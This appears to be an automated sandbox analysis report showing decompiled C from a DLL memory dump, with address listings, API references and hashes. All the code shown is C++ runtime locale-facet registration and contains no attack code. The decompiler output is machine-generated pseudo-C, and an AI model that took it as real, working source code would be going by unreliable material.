																															E6E1A1438(_t506 - 0x20);
																															E6E1E3D74(_t506 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t358, _t479, _t491, 0x14);
																															E6E1C6653(_t506 - 0x14, 0);
																															_t492 =  *0x6e286e00; // 0x0
																															 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																															 *(_t506 - 0x10) = _t492;
																															_t284 = E6E1A161C(0x6e286dac);
																															_t424 =  *((intOrPtr*)(_t506 + 8));
																															_t480 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t284);
																															__eflags = _t480;
																															if(_t480 != 0) {
																																L68:
																																E6E1C66BA(_t506 - 0x14);
																																return E6E1E0075(_t480);
																															} else {
																																__eflags = _t492;
																																if(_t492 == 0) {
																																	_push( *((intOrPtr*)(_t506 + 8)));
																																	_push(_t506 - 0x10);
																																	__eflags = E6E1D15C4(_t358, _t424, _t469, _t480, _t492) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t506 - 0x20);
																																		E6E1E3D74(_t506 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t358, _t480, _t492, 0x14);
																																		E6E1C6653(_t506 - 0x14, 0);
																																		_t493 =  *0x6e286dd0; // 0x0
																																		 *(_t506 - 4) =  *(_t506 - 4) & 0x00000000;
																																		 *(_t506 - 0x10) = _t493;
																																		_t297 = E6E1A161C(0x6e286d60);
																																		_t431 =  *((intOrPtr*)(_t506 + 8));
																																		_t481 = E6E1A171B( *((intOrPtr*)(_t506 + 8)), _t297);
																																		__eflags = _t481;
																																		if(_t481 != 0) {
																																			L75:
																																			E6E1C66BA(_t506 - 0x14);
																																			return E6E1E0075(_t481);
																																		} else {
																																			__eflags = _t493;
																																			if(_t493 == 0) {
																																				_push( *((intOrPtr*)(_t506 + 8)));
																																				_push(_t506 - 0x10);
																																				__eflags = E6E1D162A(_t358, _t431, _t469, _t481, _t493) - 0xffffffff;
																																				if(__eflags == 0) {
																																					_t435 = _t506 - 0x20;
																																					E6E1A1438(_t435);
																																					E6E1E3D74(_t506 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e22851f, _t358, _t481, _t493, 4);
																																					_t494 = _t435;
																																					 *(_t506 - 0x10) = _t494;
																																					 *((intOrPtr*)(_t494 + 4)) =  *((intOrPtr*)(_t506 + 0xc));
																																					_push( *((intOrPtr*)(_t506 + 0x14)));
																																					_t161 = _t506 - 4;
																																					 *_t161 =  *(_t506 - 4) & 0x00000000;
																																					__eflags =  *_t161;
																																					 *_t494 = 0x6e22c0c4;
																																					 *((char*)(_t494 + 0x28)) =  *((intOrPtr*)(_t506 + 0x10));
																																					E6E1D542F(_t358, _t435, _t469, _t481, _t494,  *_t161);
																																					return E6E1E0075(_t494,  *((intOrPtr*)(_t506 + 8)));
																																				} else {
																																					_t481 =  *(_t506 - 0x10);
																																					 *(_t506 - 0x10) = _t481;
																																					 *(_t506 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t481);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t481 + 4))))();
																																					 *0x6e286dd0 = _t481;
																																					goto L75;
																																				}
																																			} else {
																																				_t481 = _t493;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t480 =  *(_t506 - 0x10);
																																		 *(_t506 - 0x10) = _t480;
																																		 *(_t506 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t480);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t480 + 4))))();
																																		 *0x6e286e00 = _t480;
																																		goto L68;
																																	}
																																} else {
																																	_t480 = _t492;
																																	goto L68;
																																}
																															}
																														} else {
																															_t479 =  *(_t506 - 0x10);
																															 *(_t506 - 0x10) = _t479;
																															 *(_t506 - 4) = 1;
																															E6E1C6FD3(__eflags, _t479);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t479 + 4))))();
																															 *0x6e286dcc = _t479;
																															goto L61;
																														}
																													} else {
																														_t479 = _t491;
																														goto L61;
																													}
																												}
																											} else {
																												_t478 =  *(_t506 - 0x10);
																												 *(_t506 - 0x10) = _t478;
																												 *(_t506 - 4) = 1;
																												E6E1C6FD3(__eflags, _t478);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t478 + 4))))();
																												 *0x6e286dfc = _t478;
																												goto L54;
																											}
																										} else {
																											_t478 = _t490;
																											goto L54;
																										}
																									}
																								} else {
																									_t477 =  *(_t506 - 0x10);
																									 *(_t506 - 0x10) = _t477;
																									 *(_t506 - 4) = 1;
																									E6E1C6FD3(__eflags, _t477);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t477 + 4))))();
																									 *0x6e286de0 = _t477;
																									goto L47;
																								}
																							} else {
																								_t477 = _t489;
																								goto L47;
																							}
																						}
																					} else {
																						_t476 =  *(_t506 - 0x10);
																						 *(_t506 - 0x10) = _t476;
																						 *(_t506 - 4) = 1;
																						E6E1C6FD3(__eflags, _t476);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t476 + 4))))();
																						 *0x6e286ddc = _t476;
																						goto L40;
																					}
																				} else {
																					_t476 = _t488;
																					goto L40;
																				}
																			}
																		} else {
																			_t475 =  *(_t506 - 0x10);
																			 *(_t506 - 0x10) = _t475;
																			 *(_t506 - 4) = 1;
																			E6E1C6FD3(__eflags, _t475);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e286db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E1C6FD3(__eflags, _t474);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e286dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E1C6FD3(__eflags, _t473);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e286dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E1C6FD3(__eflags, _t472);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e286dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E1C6FD3(__eflags, _t471);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e286df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}

0x6e1cf60d
0x6e1cf60d
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf63e
0x6e1cf643
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b

APIs

__EH_prolog3.LIBCMT ref: 6E1CF614
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF61E
int.LIBCPMT ref: 6E1CF635

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF658
std::_Facet_Register.LIBCPMT ref: 6E1CF66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF6AD

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: c3aba37693dce5e3e91ad2213e1dcd5650bdaf6fe76a8a632be2ce1f24524442
Instruction ID: 0ba74a86facee1b64f7d6815e1ecc4955b8caf8c0b0232535b29cf9f0bdeb863
Opcode Fuzzy Hash: c3aba37693dce5e3e91ad2213e1dcd5650bdaf6fe76a8a632be2ce1f24524442
Instruction Fuzzy Hash: F1115CB59105298FCF01DBE4C854AFEB7BAAF68B14F240808D430F7290CF789985E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB74C, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1DB753
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB75D
int.LIBCPMT ref: 6E1DB774

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1DB797
std::_Facet_Register.LIBCPMT ref: 6E1DB7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB7EC

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 98445c1ec7342c449eadbc061b2d943b7b6773669db081b4e0d671e4bda8d183
Instruction ID: 094176256fb9e451f98f329bf7a8ca4d108f437433029e7cc1779f044fd084af
Opcode Fuzzy Hash: 98445c1ec7342c449eadbc061b2d943b7b6773669db081b4e0d671e4bda8d183
Instruction Fuzzy Hash: 4811367691051C8BCF01EBE4C894EFEB77AAF54724F140908E411AB3D0DF749988EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CEF91, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CEF98
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CEFA2
int.LIBCPMT ref: 6E1CEFB9

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1CEFDC
std::_Facet_Register.LIBCPMT ref: 6E1CEFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF013
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF031

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 725c82fe6ecce4b054070eb108035fcdfcf59a9e5d6515e3ad5095ba7d234876
Instruction ID: 1d8e61b1ae91dd48a8c23247fc23a2542eb778439727e38e09123df8f464b2b4
Opcode Fuzzy Hash: 725c82fe6ecce4b054070eb108035fcdfcf59a9e5d6515e3ad5095ba7d234876
Instruction Fuzzy Hash: 3A112C7591051DCBCF01DBD4C854BFEB77AAF64B14F244809E520E7290DF789A84E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB7F2, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1DB7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB803
int.LIBCPMT ref: 6E1DB81A

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1DB83D
std::_Facet_Register.LIBCPMT ref: 6E1DB854
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB874
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB892

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: c2729e7c1f5a28d371c58e21996ca0de90527588ec4684ee5da783be31506773
Instruction ID: b9292da3e312ab8f224c9e62ff43f6fd2e43426f7e32534bb53cdd8050cbbcab
Opcode Fuzzy Hash: c2729e7c1f5a28d371c58e21996ca0de90527588ec4684ee5da783be31506773
Instruction Fuzzy Hash: 1A1123759105188BCF01EBE4C854EFEB77ABF54B04F140908E421A7290DF749988EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF567, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CF56E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF578
int.LIBCPMT ref: 6E1CF58F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

moneypunct.LIBCPMT ref: 6E1CF5B2
std::_Facet_Register.LIBCPMT ref: 6E1CF5C9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF5E9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF607

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 7f4e8fe458faf383fdd8b751d196ba481d7390a2ddf8159ac607aa961d15fa69
Instruction ID: 5f531cba4c54a54ad4b06b08ad355e64a76451c48a0fb9a121d26e8475a6ab91
Opcode Fuzzy Hash: 7f4e8fe458faf383fdd8b751d196ba481d7390a2ddf8159ac607aa961d15fa69
Instruction Fuzzy Hash: 071127B59105198BCF01DFE4C854AFEB37ABFA4B14F244508D520AB290DF789D84E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E1DBA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t154 - 0x14, 0);
				_t147 =  *0x6e286e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1A161C(0x6e286e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E1C66BA(_t154 - 0x14);
					return E6E1E0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E1DC1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t154 - 0x20);
							E6E1E3D74(_t154 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t143, _t147, 0x14);
							E6E1C6653(_t154 - 0x14, 0);
							_t148 =  *0x6e286e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1A161C(0x6e286e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E1C66BA(_t154 - 0x14);
								return E6E1E0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E1DC229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t154 - 0x20);
										E6E1E3D74(_t154 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t110, _t144, _t148, 0x14);
										E6E1C6653(_t154 - 0x14, 0);
										_t149 =  *0x6e286e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1A161C(0x6e286e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1A171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E1C66BA(_t154 - 0x14);
											return E6E1E0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E1DC295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1A1438(_t131);
													E6E1E3D74(_t154 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e22851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e22c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E1DD028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E1E0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E1C6FD3(__eflags, _t145);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e286e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E1C6FD3(__eflags, _t144);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e286e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
